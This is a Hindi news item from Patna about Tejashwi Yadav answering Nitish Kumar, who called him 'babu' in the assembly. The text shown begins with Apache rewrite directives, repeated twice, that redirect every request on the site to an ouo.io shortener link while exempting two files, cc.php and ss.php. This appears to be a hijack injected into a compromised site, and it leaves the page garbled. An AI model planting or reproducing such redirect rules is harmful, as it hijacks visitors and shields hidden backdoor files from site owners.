
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 484
पटना। बिहार में चाचा—भतीजे की जुगलबंदी आज भी देखने को मिली। सदन में कल नीतिश द्वारा लालू के करियर पर चिंता जताने पर भतीजे तेजस्वी ने आज उनकी गुगली पर फ्रंटफुट बैटिंग की। उन्होंने कहा कि हमें खुशी है कि चाचा यानि नीतीश जी ने हमें बाबू बोला। हम चाहते हैं कि हम अगर गलत करें तो वो हमें पास बुलाएं, समझाएं, सिखाएं। लेकिन अगर वो हमें दंगा कराना, दंगा भड़काना और दंगा करने वालों को संरक्षण देना और जनादेश का अपमान करना सिखाएंगे तो हमें ऐसी सीख नहीं चाहिए। तेजस्वी ने कहा कि हमें राजनीति में सेवा करनी है। करियर नहीं बनाना है। कुल मिला कर लालू के लाल अब नीतीश के बाबू बन गए हैं। तेजस्वी हमेशा नीतीश को चाचा कहते हैं। लेकिन नीतीश ने पहली बार उन्हें कल सदन में बाबू कहा। एक समय था जब राजनीति में कदम रखते ही तेजस्वी ना सिर्फ लोकतंत्र के मंदिर की सीढ़ियां चढ़ गए थे, बल्कि मुख्यमंत्री नीतीश के बगलगीर यानि उपमुख्यमंत्री बन गए थे। तब तेजस्वी में नीतीश को बड़ा तेज नजर आता था और तेजस्वी को नीतीश में अपना चाचा। नीतीश-तेजस्वी में तब से ही चाचा-भतीजे की जुगलबंदी शुरू हुई थी।